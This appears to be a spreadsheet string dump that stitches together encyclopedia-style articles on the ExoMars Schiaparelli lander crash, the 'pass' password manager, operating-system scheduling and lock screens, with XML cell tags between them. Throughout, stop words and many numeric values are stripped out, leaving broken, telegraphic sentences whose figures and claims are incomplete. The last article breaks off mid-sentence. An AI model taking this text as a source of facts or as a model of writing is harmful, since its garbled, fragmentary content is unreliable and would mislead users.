launch successful spacecraft functioning properly. shortly separation probes, briz-m upper booster stage exploded kilometres away, without damaging orbiter lander. cruise, separation arrival after launch, trace orbiter (tgo) traveled together coasting space towards mars. during time powered umbilical power line tgo, thus preserving edm's limited internal batteries. deep space manoeuvre executed main engine legs july august order target entry flight path angle landing site. october 2016, final adjustment trajectory separation schiaparelli. launch mass spacecraft together 4332 including schiaparelli module. this heaviest spacecraft sent mars. journey earth mars 2016 took months.on october 2016, separated, orbiter heading mars orbit insertion mars atmospheric entry. prior separation, spun (see also spin stabilization) released velocity km/h relative tgo. designed lower-power hibernation mode days traveled solo mars. came hibernation hour half prior reaching martian atmosphere. meanwhile, separation, adjusted trajectory mars orbit insertion october 2016 performed 139-minute rocket engine burn enter mars orbit. day, schiaparelli module arrived mars traveling 21,000 km/h (13,000 mph; km/s) engaged prime task entry, descent, landing. after successful atmospheric entry, module's speed reduced km/s entry value hundred drag force provided atmosphere mars. during phase flight, heat shield used protect payload severe heat load. parachute triggered on-board software accelerometers detected given non-gravitational acceleration value m/s2, expected. after reached sub-sonic regime means nominally-inflated parachute, schiaparelli module experienced anomaly causing backshell parachute release occur earlier expected preventing retrorockets slowing descent. hard touch-down location, reconstructed using data mars reconnaissance orbiter, identified quite close expected landing site, short-range entered mars' orbit underwent several months aerobraking adjust speed orbit, science activities beginning late 2017. continue serving relay satellite future mars landing missions 2022. landing site landing site chosen meridiani planum, martian plain prized mars landers flat terrain elevation gives spacecraft time distance slow reaching ground. cannot avoid obstacles descent, important pick large flat area minimum obstacles. landing ellipse long wide, centered west south running east–west, eastern edge including opportunity rover landing site, near endeavour crater still operating launched attempted land. opportunity rover (mer-b) landing site called challenger memorial station. also thought would chance arriving mars experienced global dust storms, thus gain knowledge atmosphere less common conditions. site also known scientifically interesting; opportunity rover discovered type iron mineral forms presence water, theorized significant amount water past. dust storm goal landing planned take place meridiani planum dust storm season, would provided chance characterise dust-loaded atmosphere entry descent, measure dust's static electricity charge—typically produced charge transfer contact particles—and conduct surface measurements associated dust-rich environment. global dust storms occurred least nine times since 1924 including 1977, 1982, 1994, 2001 2007; 2007 dust storms nearly ended functioning solar-powered u.s. mars exploration rovers spirit opportunity. global dust storms obscured mars mariner orbiter arrived 1971, took several weeks dust settle allow clear imaging surface mars. predicted mars global dust storms likely occur fall 2016, started attempted landing. global dust storms summer 2018, cutting light solar powered opportunity rover still operating nearby schiaparelli landing site. entry, descent, landing events sequence schiaparelli lander separated orbiter october 2016, three days arrival mars, entered atmosphere 21,000 km/h (13,000 mph) october 2016 (see also mars atmospheric entry). when lander disconnected orbiter, switched internal battery power used low-power hibernation mode coasted three days entering martian atmosphere. schiaparelli came hibernation several hours entry, speed 21,000 km/h (13,000 mph) altitude 122.5 (76.1 surface mars. heat shield used plunge atmosphere decelerate lander 1,650 km/h (1,030 mph) time reached (6.8 altitude. during entry comars+ instrumentation operated collect data heat flow around entry capsule.after slowing initial entry atmosphere, module deployed parachute complete landing retrorockets using closed-loop guidance, navigation control system based doppler radar altimeter sensor, on-board inertial measurement units. throughout descent, various sensors recorded number atmospheric parameters lander performance. plan (4.3 altitude front heat shield would jettisoned radar altimeter turned (0.81 altitude mars rear heat cover parachute would jettisoned.the final stages landing performed using pulse-firing liquid-fuel engines retrorockets. about metres ground, engines designed turn platform land crushable structure, designed deform absorb final touchdown impact. final landing designed endure rocks high, hoped, guaranteed, out-sized boulders craters would encountered. final contact, lander designed handle slopes degrees rocks height.the opportunity rover operating region teams worked together attempt image descent, which, depending conditions, might possible especially "went long" landing ellipse. however, rover's cameras view lander descent. first time surface probe attempted image landing another vehicle surface mars. (other spacecraft imaged other, especially orbiters viewing ones ground, 2005 mars global surveyor imaged mars express orbit around mars.) summary planned): contact lost module seconds planned touch-down. october 2016, studying data, said likely things went wrong parachute released early, engines turned turned short time. crash schiaparelli lander attempted automated landing october 2016, signal unexpectedly lost short time planned landing time. esa's mars express nasa's mars reconnaissance orbiter (mro) maven continued listening lander's signal avail.schiaparelli transmitted megabytes telemetry landing attempt, detailed analysis found atmospheric entry occurred normally, parachute deploying (7.5 1,730 km/h (1,070 mph), heat shield releasing (4.8 mi). however, lander's inertial measurement unit, measures rotation, became saturated (unable take higher readings) second. this saturation, coupled data navigation computer, generated altitude reading negative, ground level. this caused premature release parachute back shell. braking thrusters fired three seconds rather expected seconds, followed activation ground systems vehicle already landed. reality, still altitude (2.3 mi). lander continued transmitting seconds thrusters off; loss signal occurred seconds supposed land. schiaparelli impacted martian surface km/h (190 mph), near terminal velocity. attempted landing, context camera nasa's identified ground markings lander's impact parachute. crash site (~33.5 miles) active nasa mars rover opportunity time landing. october 2016, released high resolution images crash site taken hirise camera october 2016. front heatshield, module impact site, rear heat-shield parachute identified. thought crater half metre (yard) deep possible study crater later time. related note, artificially made crater actually goal thor mission proposed mars scout program produced phoenix maven, goal sub-surface excavation. that mission passed over, another orbiter able discover naturally occurring fresh impact craters, found them. although lander crashed, officials declared schiaparelli success fulfilled primary function testing landing system 2020 kazachok lander returning telemetry data descent. october, bulk descent data returned earth analysed. unlike beagle lander, heard released mars express 2003, exomars module transmitted descent data collected transmitted lost spacecraft destroyed impact. investigation cause crash investigation concluded 2017 identified four "root causes mishap [...]: insufficient uncertainty configuration management modelling parachute dynamics expect much lower dynamics observed flight; inadequate persistence time [inertial measurement unit] saturation flag inadequate handling saturation [guidance navigation control]; insufficient approach failure detection, isolation recovery design robustness; mishap management subcontractors acceptance hardware."the board inquiry's investigation revealed time lander deployed parachute began spinning unexpectedly fast. this superfast rotation briefly saturated schiaparelli's spin-measuring instrument, resulted large attitude-estimation error guidance, navigation control-system software. this resulted computer calculating ground level, triggering early release parachute backshell, brief firing thrusters seconds instead seconds, activation on-ground system schiaparelli landed. inquiry also determined "[t]he mission would jeopardised attitude knowledge error induced [inertial measurement unit] saturation, persistence time would lower value.": images module's crash site suggested fuel tank exploded impact. estimated lander impacted surface km/h m/s; mph). additional imaging site november confirmed identity spacecraft's parts. additional imaging colour noted parachute slightly shifted. taking images using technique called super-resolution reconstruction (srr) resolution improved, done formerly lost beagle probe. benefits images easier discern image noise cosmic hits real objects, among bright spots high albedo objects versus momentary specular reflections. finally, multiple images time, movement changes, wind blowing parachute observed. instrument sensor payload primary mission goal test landing systems, including parachute, doppler radar altimeter, hydrazine thrusters, etc. secondary mission goal scientific. lander measure wind speed direction, humidity, pressure surface temperature, determine transparency atmosphere. surface science payload called dreams, designed obtain meteorological data days landing, well make first measurements atmospheric electricity mars.a descent camera (deca) included payload. captured images transmitted landing. amelia, comars+, deca collected data entry, descent, landing minutes. much data transmitted descending. although portion designed last literally minutes, surface observations days, instrument, inrri, passive laser retro-reflector could used long possible, even decades later, laser range-finding lander.inrri mounted (zenith) side lander, enable spacecraft target mass grams, contributed italian space agency (asi). design used cube corner reflector return incoming laser light. cubes made fused silica mounted aluminum support structure. inrri also mounted insight mars lander. summary science-technology payload dreams (dust characterization, risk assessment, environmental analyser martian surface) metwind (wind detection) dreams-h (humidity detection) dreams-p (pressure detection) marstem (temperature detection) solar irradiance sensor (transparency atmosphere) micro-ares (atmospheric electricity detector) amelia (atmospheric mars entry landing investigation analysis) deca (descent camera) comars+ (combined aerothermal sensor package) measured heat mars atmospheric entry. inrri (instrument landing roving laser retroreflector investigations)compact laser retro-reflector detecting lander laser-ranging dreams lander's scientific payload surface meteorological dreams (dust characterization, risk assessment, environment analyser martian surface) package, consisting suite sensors measure wind speed direction (metwind), humidity (methumi), pressure (metbaro), surface temperature (marstem), transparency atmosphere (solar irradiance sensor sis), atmospheric electrification (atmospheric relaxation electric-field sensor micro-ares). institutions contributed dreams science payload include inaf cisas italy, latmos france, estec netherlands, finland, inta spain.the dreams payload intended function mars days environmental station duration surface mission landing. planned lander arrival made coincide mars global dust storm season collect data dust-loaded mars atmosphere. dreams hoped provide insights role electric forces dust lifting, mechanism initiates dust storms. addition, methumi sensor intended complement microares measurements critical data humidity, enable scientists better understand dust electrification process.atmospheric electricity mars still unmeasured, possible role dust storms atmospheric chemistry remains unknown. speculated atmospheric electricity played role inconclusive results viking lander life experiments, positive metabolizing microbial life, organic compounds detected mass spectrometer. favored possible explanations reactions hydrogen peroxide ozone created ultraviolet light atmospheric electrical processes dust storms.dreams-p pressure sensor dreams-h humidity; sensors feed single data-handling circuit board.in addition surface payload, camera called deca (descent camera) lander operated descent. intended deliver additional context information exact location data form images. deca reflight visual monitoring camera (vmc) planck herschel mission.another surface experiment focused dust materials adherence experiment mars pathfinder lander, twenty years prior exomars. descent camera descent camera (deca) intended capture downward-looking views approached surface mars. begin acquiring images lower heat shield ejected. this camera degree field view capture greyscale images, support technical knowledge descent. deca flight spare visual monitoring camera herschel space observatory plank mission launched together. camera dimensions (3.5 squared, mass (1.3 lb). deca descent camera data stored descent meant relayed earth landing, images lost crash. purpose transfer delay protect spacecraft data electrostatic discharges. deca designed built belgium optique instruments précision (oip).the main goals deca included: image landing area measure transparency martian atmosphere, collect data topography landing area preliminary results because schiarapelli demonstrator lander transmitted descent, great deal telemetry successfully returned. about megabytes data, amounting telemetry, relayed earth used investigate failure modes landing technology employed. specifications note masses: mars surface gravity less earth, weight earth weight. power systems point, roscosmos offered contribute watt radioisotope thermoelectric generator (rtg) power source lander allow monitor local surface environment full martian year, complex russian export control procedures, later opted non-rechargeable electric battery enough power sols. solar panels also considered longer mission (1–2 months) supported heavier, complex, lander consideration. 2010s focus executing short-lived days surface time) technology demonstration, emphasis landing systems. communication systems network schiaparelli radio communicate mars orbiters. lander antennae, back shell lander. when back shell ejected, transmit spiral antenna body lander. when orbiter communicate lander depends orbit, orbiters could record talk lander globe mars blocks line sight lander. exomars could also communicate using system. "woke hibernation minutes prior landing, transmitted continuously minutes prior landing.during landing, signal monitored mars mars express orbiter, remotely giant metrewave radio telescope pune, india. mars express also communicates landers rovers using melacom communication system. mars reconnaissance orbiter (mro) overflew landing hours landing, available check signals schiaparelli. exomars could also communicate using system.the communication system standard mars electra radio, since arrival mars reconnaissance orbiter 2006. prior this, several orbiters used first generation relay system, including mars global surveyor, mars odyssey, mars express. using orbiters relay data mars landers rovers noted energy efficiency.on october 2016 took minutes seconds radio transmission travel roughly speed light mars earth. even though radio array pune listened "real time", entire sequence, would take minutes, already occurred even recorded starting enter atmosphere. there tiny variation speed light slowed mars earth (see refractive index), another factor time dilation, probe existed significantly different velocity different gravitational field radio station back earth (though relatively small). computing schiaparelli lander main computers, called central terminal power unit (ctpu) housed warm top, computer called remote terminal power unit (rtpu) underside lander. overall, ctpu handles surface operations rtpu handles entry descent, actually destroyed final landing surface underside. when trace orbiter entry demonstrator module connected, rtpu handles interface sends power orbiter module. when disconnects orbiter, must internal batteries. ctpu uses leon central processor based microsystems' risc-based sparc processor architecture, also ram, prom, timer. ctpu also handles data sent radio communication system. when lander disconnects orbiter, spends time low-power hibernation mode coasts space entering martian atmosphere. lander must coast space days landing, meanwhile orbiter mars orbit insertion. deca descent camera data downloaded computer relay earth landing, transmitted descent. parachute disk-band-gap parachute deployed pyrotechnic mortar. tested full scale largest wind tunnel world part development. sub-scale parachute tested earth's atmosphere 2011; ascended balloon 24.5 kilometers altitude released, pyrotechnic deployment systems tested period free-fall. october 2016 parachute successfully deployed mars.in summer 2019, problems parachute next tranche project occurred testing, despite technology test; issues parachute system delay phase. retro-rockets schiaparelli module sets three thrusters, nine total, operate starting (half mile) pulse mode, slowing spacecraft (252 km/h). each nine engines cht-400 rocket engine produce newtons thrust. these rocket engines fueled three spherical 17.5 liter tanks holding hydrazine propellant. tanks hold 15–16 kilograms hydrazine (about pounds, stones) fuel tank, overall (101 pounds 7.24 stones). propellant pressurized helium, held single tank containing 15.6 liters pressure (2465 psi). thrusters shut meters/yards surface, crumple zone underneath lander handles final stop. data timer, doppler radar, inertial measurement unit merged lander's computers control operation thrusters. impact exomars possible "shutdown" moment next exomars mission ministerial meeting december 2016 considered certain issues including €300 million exomars funding lessons learned exomars 2016 missions far. concern schiaparelli crash, landing system used exomars 2020 mission consisting rosalind franklin rover delivered instrumented 2020 kazachok lander.the exomars team praised "putting brave face" happened positive edm's credible return prime mission: data entry, descent, landing, despite crash.another positive development demonstrator module part overall grand plan exomars, meant landing technologies underwent real-world test carrying valuable cargo.a preliminary report malfunction presented december 2016 ministerial meeting. december outcome known: exomars would financially supported esa. €436 million ($464 million) authorized finish mission. after many challenging, difficult rewarding moments 2016, great relief fine result european space exploration, landing location glossary also beagle failed mars lander launched 2003 huygens (spacecraft) european reconnaissance lander sent saturn's moon titan list missions mars list spacecraft powered non-rechargeable batteries mars landing landing spacecraft surface mars hayabusa2 japanese space mission asteroid ryugu philae (spacecraft) robotic european space agency lander accompanied rosetta spacecraft references external links exomars landing zone likely schiaparelli crash site imaged mars reconnaissance orbiter planetary society (this diagram overlaying landing ellipse mer-b traverse) more detailed view crash site october 2016) electric dust storms atmospheric electricity (edm going measure atmospheric electricity) micro-ares, electric field sensor exomars 2016 video crushable material crumple bumber tested capturing martian weather motion november 2016 exomars design overview circa 2011 pictures schiaparelli photo lander construction) schiaparelli's descent mars (esa video planned descent surface) crash site (11.15.16) exomars 2016 schiaparelli anomaly inquiry (18.05.2017)</t>
  </si>
  <si>
    <t>Pass (software)</t>
  </si>
  <si>
    <t>pass password manager inspired unix philosophy. command-line interface, uses gnupg encryption decryption stored passwords.the passwords encrypted stored separate files, organized operating system's filesystem. password file contain additional text, username, email address, comments, anything user would like, since password files nothing encrypted text files. there several graphical user interfaces (guis) available, qtpass linux/windows/macos password store android operating systems. syncing system implemented, syncing achieved using version control system. built functionality also allows automated version history tracking password store. vulnerabilities june 2018, pass found vulnerable variant sigspoof attack. issue patched vulnerability disclosed. also list password managers password manager cryptography references external links official website</t>
  </si>
  <si>
    <t>Scheduling (computing)</t>
  </si>
  <si>
    <t>computing, scheduling action assigning resources perform tasks. resources processors, network links expansion cards. tasks threads, processes data flows. scheduling activity carried process called scheduler. schedulers often designed keep computer resources busy load balancing), allow multiple users share system resources effectively, achieve target quality-of-service. scheduling fundamental computation itself, intrinsic part execution model computer system; concept scheduling makes possible computer multitasking single central processing unit (cpu). goals scheduler goals, example: maximizing throughput (the total amount work completed time unit); minimizing wait time (time work becoming ready first point begins execution); minimizing latency response time (time work becoming ready finished case batch activity, system responds hands first output user case interactive activity); maximizing fairness (equal time process, generally appropriate times according priority workload process).in practice, goals often conflict (e.g. throughput versus latency), thus scheduler implement suitable compromise. preference measured concerns mentioned above, depending upon user's needs objectives. real-time environments, embedded systems automatic control industry (for example robotics), scheduler also must ensure processes meet deadlines; crucial keeping system stable. scheduled tasks also distributed remote devices across network managed administrative back end. types operating system schedulers scheduler operating system module selects next jobs admitted system next process run. operating systems feature three distinct scheduler types: long-term scheduler (also known admission scheduler high-level scheduler), mid-term medium-term scheduler, short-term scheduler. names suggest relative frequency functions performed. process scheduler process scheduler part operating system decides process runs certain point time. usually ability pause running process, move back running queue start process; scheduler known preemptive scheduler, otherwise cooperative scheduler.we distinguish "long-term scheduling", "medium-term scheduling", "short-term scheduling" based often decisions must made. long-term scheduling long-term scheduler, admission scheduler, decides jobs processes admitted ready queue main memory); attempt made execute program, admission currently executing processes either authorized delayed long-term scheduler. thus, scheduler dictates processes system, degree concurrency supported time whether many processes executed concurrently, split i/o-intensive cpu-intensive processes handled. long-term scheduler responsible controlling degree multiprogramming. general, processes described either i/o-bound cpu-bound. i/o-bound process spends time spends computations. cpu-bound process, contrast, generates requests infrequently, using time computations. important long-term scheduler selects good process i/o-bound cpu-bound processes. processes i/o-bound, ready queue almost always empty, short-term scheduler little hand, processes cpu-bound, waiting queue almost always empty, devices unused, system unbalanced. system best performance thus combination cpu-bound i/o-bound processes. modern operating systems, used make sure real-time processes enough time finish tasks.long-term scheduling also important large-scale systems batch processing systems, computer clusters, supercomputers, render farms. example, concurrent systems, coscheduling interacting processes often required prevent blocking waiting other. cases, special-purpose scheduler software typically used assist functions, addition underlying admission scheduling support operating system. some operating systems allow tasks added sure real-time deadlines still met. specific heuristic algorithm used operating system accept reject tasks admission control mechanism. medium-term scheduling medium-term scheduler temporarily removes processes main memory places secondary memory (such hard disk drive) vice versa, commonly referred "swapping out" "swapping (also incorrectly "paging out" "paging in"). medium-term scheduler decide swap process active time, process priority, process page faulting frequently, process taking large amount memory order free main memory processes, swapping process back later memory available, process unblocked longer waiting resource. [stallings, 396] [stallings, 370] many systems today (those support mapping virtual address space secondary storage swap file), medium-term scheduler actually perform role long-term scheduler, treating binaries "swapped processes" upon execution. way, segment binary required swapped demand, "lazy loaded",[stallings, 394] also called demand paging. short-term scheduling short-term scheduler (also known scheduler) decides ready, in-memory processes executed (allocated cpu) clock interrupt, interrupt, operating system call another form signal. thus short-term scheduler makes scheduling decisions much frequently long-term mid-term schedulers scheduling decision minimum made every time slice, short. this scheduler preemptive, implying capable forcibly removing processes decides allocate another process, non-preemptive (also known "voluntary" "co-operative"), case scheduler unable "force" processes cpu. preemptive scheduler relies upon programmable interval timer invokes interrupt handler runs kernel mode implements scheduling function. dispatcher another component involved cpu-scheduling function dispatcher, module gives control process selected short-term scheduler. receives control kernel mode result interrupt system call. functions dispatcher involve following: context switches, dispatcher saves state (also known context) process thread previously running; dispatcher loads initial previously saved state process. switching user mode. jumping proper location user program restart program indicated state.the dispatcher fast possible, since invoked every process switch. during context switches, processor virtually idle fraction time, thus unnecessary context switches avoided. time takes dispatcher stop process start another known dispatch latency.: scheduling disciplines scheduling discipline (also called scheduling policy scheduling algorithm) algorithm used distributing resources among parties simultaneously asynchronously request them. scheduling disciplines used routers handle packet traffic) well operating systems share time among threads processes), disk drives (i/o scheduling), printers (print spooler), embedded systems, etc. main purposes scheduling algorithms minimize resource starvation ensure fairness amongst parties utilizing resources. scheduling deals problem deciding outstanding requests allocated resources. there many different scheduling algorithms. section, introduce several them. packet-switched computer networks statistical multiplexing, notion scheduling algorithm used alternative first-come first-served queuing data packets. simplest best-effort scheduling algorithms round-robin, fair queuing max-min fair scheduling algorithm), proportional-fair scheduling maximum throughput. differentiated guaranteed quality service offered, opposed best-effort communication, weighted fair queuing utilized. advanced packet radio wireless networks hsdpa (high-speed downlink packet access) 3.5g cellular system, channel-dependent scheduling used take advantage channel state information. channel conditions favourable, throughput system spectral efficiency increased. even advanced systems lte, scheduling combined channel-dependent packet-by-packet dynamic channel allocation, assigning ofdma multi-carriers frequency-domain equalization components users best utilize them. first come, first served first first (fifo), also known first come, first served (fcfs), simplest scheduling algorithm. fifo simply queues processes order arrive ready queue. this commonly used task queue, example illustrated section. since context switches occur upon process termination, reorganization process queue required, scheduling overhead minimal. throughput low, long processes holding cpu, causing short processes wait long time (known convoy effect). starvation, process gets chance executed definite time. turnaround time, waiting time response time depend order arrival high reasons above. prioritization occurs, thus system trouble meeting process deadlines. lack prioritization means long every process eventually completes, starvation. environment processes might complete, starvation. based queuing. priority scheduling earliest deadline first (edf) least time dynamic scheduling algorithm used real-time operating systems place processes priority queue. whenever scheduling event occurs task finishes, task released, etc.), queue searched process closest deadline, next scheduled execution. shortest remaining time first similar shortest first (sjf). with strategy scheduler arranges processes least estimated processing time remaining next queue. this requires advanced knowledge estimations time required process complete. shorter process arrives another process' execution, currently running process interrupted (known preemption), dividing process separate computing blocks. this creates excess overhead additional context switching. scheduler must also place incoming process specific place queue, creating additional overhead. this algorithm designed maximum throughput scenarios. waiting time response time increase process's computational requirements increase. since turnaround time based waiting time plus processing time, longer processes significantly affected this. overall waiting time smaller fifo, however since process wait termination longest process. particular attention given deadlines, programmer attempt make processes deadlines short possible. starvation possible, especially busy system many small processes run. policy least processes different priority fixed priority pre-emptive scheduling operating system assigns fixed priority rank every process, scheduler arranges processes ready queue order priority. lower-priority processes interrupted incoming higher-priority processes. overhead minimal, significant. fpps particular advantage terms throughput fifo scheduling. number rankings limited, characterized collection fifo queues, priority ranking. processes lower-priority queues selected higher-priority queues empty. waiting time response time depend priority process. higher-priority processes smaller waiting response times. deadlines giving processes deadlines higher priority. starvation lower-priority processes possible large numbers high-priority processes queuing time. round-robin scheduling scheduler assigns fixed time unit process, cycles them. process completes within time-slice gets terminated otherwise rescheduled giving chance processes. scheduling involves extensive overhead, especially small time unit. balanced throughput fcfs/ fifo sjf/srtf, shorter jobs completed faster fifo longer processes completed faster sjf. good average response time, waiting time dependent number processes, average process length. because high waiting times, deadlines rarely pure system. starvation never occur, since priority given. order time unit allocation based upon process arrival time, similar fifo. time-slice large becomes fcfs /fifo short becomes sjf/srtf. multilevel queue scheduling this used situations processes easily divided different groups. example, common division made foreground (interactive) processes background (batch) processes. these types processes different response-time requirements different scheduling needs. useful shared memory problems. work-conserving schedulers work-conserving scheduler scheduler always tries keep scheduled resources busy, submitted jobs ready scheduled. contrast, non-work conserving scheduler scheduler that, cases, leave scheduled resources idle despite presence jobs ready scheduled. scheduling optimization problems there several scheduling problems goal decide goes station time, total makespan minimized: shop scheduling jobs identical stations. each executed single machine. this usually regarded online problem. open-shop scheduling jobs different stations. each spend time station, free order. flow shop scheduling jobs different stations. each spend time station, pre-determined order. manual scheduling common method embedded systems schedule jobs manually. this example done time-multiplexed fashion. sometimes kernel divided three parts: manual scheduling, preemptive interrupt level. exact methods scheduling jobs often proprietary. resource starvation problems very high predictability; allows implementation hard real-time systems almost overhead optimal applications effectiveness completely dependent implementation choosing scheduling algorithm when designing operating system, programmer must consider scheduling algorithm perform best system going see. there universal "best" scheduling algorithm, many operating systems extended combinations scheduling algorithms above. example, windows nt/xp/vista uses multilevel feedback queue, combination fixed-priority preemptive scheduling, round-robin, first first algorithms. system, threads dynamically increase decrease priority depending serviced already, waiting extensively. every priority level represented queue, round-robin scheduling among high-priority threads fifo among lower-priority ones. sense, response time short threads, short critical system threads completed quickly. since threads time unit round-robin highest-priority queue, starvation problem longer high-priority threads. operating system process scheduler implementations algorithm used simple round-robin process given equal time (for instance usually cycling list. process executes process process back process more advanced algorithms take account process priority, importance process. this allows processes time processes. kernel always uses whatever resources needs ensure proper functioning system, said infinite priority. systems, processor affinity considered increase overall system performance, even cause process slowly. this generally improves performance reducing cache thrashing. os/360 successors os/360 available three different schedulers. differences variants often considered three different operating systems: single sequential scheduler option, also known primary control program (pcp) provided sequential execution single stream jobs. multiple sequential scheduler option, known multiprogramming fixed number tasks (mft) provided execution multiple concurrent jobs. execution governed priority default stream could requested separately job. version added subtasks (threads), executed priority based parent job. each stream defined maximum amount memory could used stream. multiple priority schedulers option, multiprogramming variable number tasks (mvt), featured subtasks start; requested priority memory required execution.later virtual storage versions added workload manager feature scheduler, schedules processor resources according elaborate scheme defined installation. windows very early ms-dos microsoft windows systems non-multitasking, feature scheduler. windows 3.1x used non-preemptive scheduler, meaning interrupt programs. relied program tell need processor could move another process. this usually called cooperative multitasking. windows introduced rudimentary preemptive scheduler; however, legacy support opted applications without preemption.windows nt-based operating systems multilevel feedback queue. priority levels defined, priorities "normal" priorities priorities soft real-time priorities, requiring privileges assign. reserved operating system. user interfaces apis work priority classes process threads process, combined system absolute priority level. kernel change priority level thread depending usage whether interactive (i.e. accepts responds input humans), raising priority interactive bounded processes lowering bound processes, increase responsiveness interactive applications. scheduler modified windows vista cycle counter register modern processors keep track exactly many cycles thread executed, rather using interval-timer interrupt routine. vista also uses priority scheduler queue disk defragmenters programs interfere foreground operations. classic macos uses cooperative scheduling threads, process controls multiple cooperative threads, also provides preemptive scheduling multiprocessing tasks. kernel schedules multiprocessing tasks using preemptive scheduling algorithm. process manager processes within special multiprocessing task, called "blue task". those processes scheduled cooperatively, using round-robin scheduling algorithm; process yields control processor another process explicitly calling blocking function waitnextevent. each process copy thread manager schedules process's threads cooperatively; thread yields control processor another thread calling yieldtoanythread yieldtothread.macos uses multilevel feedback queue, four priority bands threads normal, system high priority, kernel mode only, real-time. threads scheduled preemptively; macos also supports cooperatively scheduled threads implementation thread manager carbon. version three possible values thread scheduling policy: first first out: once thread policy scheduled, runs completion unless blocked, voluntarily yields control cpu, higher-priority thread becomes dispatchable. only fixed-priority threads fifo scheduling policy. round robin: this similar version scheduler round-robin scheme based time slices. when thread control time slice, moves tail queue dispatchable threads priority. only fixed-priority threads round robin scheduling policy. other: this policy defined posix1003.4a implementation-defined. version policy defined equivalent except applies threads non-fixed priority. recalculation running thread's priority value clock interrupt means thread lose control priority value risen another dispatchable thread. this version behavior.threads primarily interest applications currently consist several asynchronous processes. these applications might impose lighter load system converted multithreaded structure. implements following scheduling policies: fifo, round robin, fair round robin. fifo policy three different implementations: fifo, fifo2, fifo3. round robin policy named sched_rr aix, fair round robin called sched_other. linux linux linux 2.4, o(n) scheduler multilevel feedback queue priority levels ranging used; 0–99 reserved real-time tasks 100–140 considered nice task levels. real-time tasks, time quantum switching processes approximately nice tasks approximately scheduler queue ready processes, letting highest priority processes first time slices, placed expired queue. when active queue empty expired queue become active queue vice versa. however, enterprise linux distributions suse linux enterprise server replaced scheduler backport o(1) scheduler (which maintained alan linux 2.4-ac kernel series) linux kernel used distribution. linux 2.6.0 linux 2.6.22 versions 2.6.0 2.6.22, kernel used o(1) scheduler developed ingo molnar many kernel developers linux development. many kernel time frame, kolivas developed patch sets improved interactivity scheduler even replaced schedulers. since linux 2.6.23 kolivas' work, significantly implementation "fair scheduling" named "rotating staircase deadline", inspired ingo molnár develop completely fair scheduler replacement earlier o(1) scheduler, crediting kolivas announcement. first implementation fair queuing process scheduler widely used general-purpose operating system.the completely fair scheduler (cfs) uses well-studied, classic scheduling algorithm called fair queuing originally invented packet networks. fair queuing previously applied scheduling name stride scheduling. fair queuing scheduler scheduling complexity {\displaystyle o(\log number tasks runqueue. choosing task done constant time, reinserting task requires {\displaystyle o(\log operations, queue implemented red–black tree. brain fuck scheduler, also created kolivas, alternative cfs. freebsd freebsd uses multilevel feedback queue priorities ranging 0–255. 0–63 reserved interrupts, 64–127 half kernel, 128–159 real-time user threads, 160–223 time-shared user threads, 224–255 idle user threads. also, like linux, uses active queue setup, also idle queue. netbsd netbsd uses multilevel feedback queue priorities ranging 0–223. 0–63 reserved time-shared threads (default, sched_other policy), 64–95 user threads entered kernel space, 96-128 kernel threads, 128–191 user real-time threads (sched_fifo sched_rr policies), 192–223 software interrupts. solaris solaris uses multilevel feedback queue priorities ranging 169. priorities 0–59 reserved time-shared threads, 60–99 system threads, 100–159 real-time threads, 160–169 priority interrupts. unlike linux, process done using time quantum, given priority back queue. solaris introduced scheduling classes, namely fixed priority class fair share class. threads fixed priority priority range time-sharing class, priorities dynamically adjusted. fair scheduling class uses shares prioritize threads scheduling decisions. shares indicate entitlement resources. they allocated processes, collectively known project. summary also notes references further reading operating systems: three easy pieces remzi arpaci-dusseau andrea arpaci-dusseau. arpaci-dusseau books, 2014. relevant chapters: scheduling: introduction multi-level feedback queue proportional-share scheduling multiprocessor scheduling brief discussion scheduling algorithms understanding linux kernel: chapter process scheduling kerneltrap: linux kernel scheduler articles monitoring tuning josh aas' introduction linux 2.6.8.1 scheduler implementation peter brucker, sigrid knust. complexity results scheduling problems torsche scheduling toolbox matlab toolbox scheduling graph algorithms. survey cellular networks packet scheduling large-scale cluster management google borg</t>
  </si>
  <si>
    <t>Lock screen</t>
  </si>
  <si>
    <t>lock screen computer user interface element used various operating systems. they regulate immediate access device requiring user perform certain action order receive access, entering password, using certain button combination, performing certain gesture using device's touchscreen. there various authentication methods past lock screen, popular common ones personal identification numbers (pins), android pattern lock, biometrics (e.g. touch facial recognition).depending operating system device type, lock screen range simple login screen, overview screen current date time, weather, recent notifications, playback controls media played background (typically music), shortcuts applications (such camera), optionally, contact information device's owner (which used event device lost stolen, medical emergency). lock screens platform mobile operating systems mobile operating system smartphones tablets typically gesture based lock-screen. phones manufactured neonode unlocked swiping right touchscreen. apple's ios, used iphone ipad lines, utilized similar unlock mechanism on-screen slider slid right. beginning sliding direction sends user directly camera app. slider widget removed part larger overhaul interface, users could swipe point screen. lock screen also displays clock, notifications, provides audio playback controls. made major changes lock screen, replacing sliding gesture pressing home button. swiping still used access camera, well additional page left widgets. iphone ipad physical home buttons, user must swipe upwards bottom screen instead.at first, android gesture-based lock screen, electing require user press phone's menu button. android 2.0, gesture-based lock screen introduced, displaying icons: unlocking phone, setting volume mode, activated dragging relevant icon center screen curve (similarly rotary dial). android 2.1, rotary dial replaced tabs either screen. android introduced design: ball padlock icon dragged outside circular area. 4.0, option unlock straight camera provided, adds ability unlock google search screen dragging android makes additional changes lock screen, allowing users widgets pages accessible lock screen swiping left edge screen. camera accessed similar manner swiping right edge screen. android also allows devices locked using either password, passcode, pattern grid circles, fingerprint sensing, facial recognition.android distributions manufacturers typically different lock screen designs stock android utilizes; versions htc's sense used metallic ring dragged bottom screen unlock phone, also allows users launch apps dragging respective shortcut icon ring instead. samsung devices, lock screen involves dragging direction location screen (touchwiz nature devices, galaxy also accompanied visual effect, pond ripple lens flare); similarly htc's lock screen, shortcuts dragged bottom screen unlock directly them. operating systems windows offered ability users "lock" computers displaying login window, requires active user's password entered re-gain access system. since windows lock function also bound keyboard shortcut win+l. windows lock screen re-designed closer resemble used mobile operating systems; users choose distinct wallpaper lock screen, also displays clock, calendar events, notifications apps. screen dragged upwards mouse touchscreen unlock device. windows maintains design, whilst adding ability cortana voice assistant lock screen, support slide shows, "windows spotlight" service retrieve daily wallpapers optionally receive advertising suggestions related wallpaper.screen locking functionality also built screensaver systems unix-like operating systems, xscreensaver gnome-screensaver. monetization particularly android, custom lock screen software designed replace default lock screen displays advertising otherwise sponsored content. amazon's android-based kindle fire tablets display notifications "special offers" lock screen, unless users purchase expensive device disables feature. 2016, amazon began market discounted smartphones exclusive amazon prime subscribers subsidized "special offers" pre-loaded amazon apps. november 2017, google play store prohibited apps displaying advertisements lock screen unless specifically designed replace lock screen, citing issues adware embedded unrelated apps. indian company 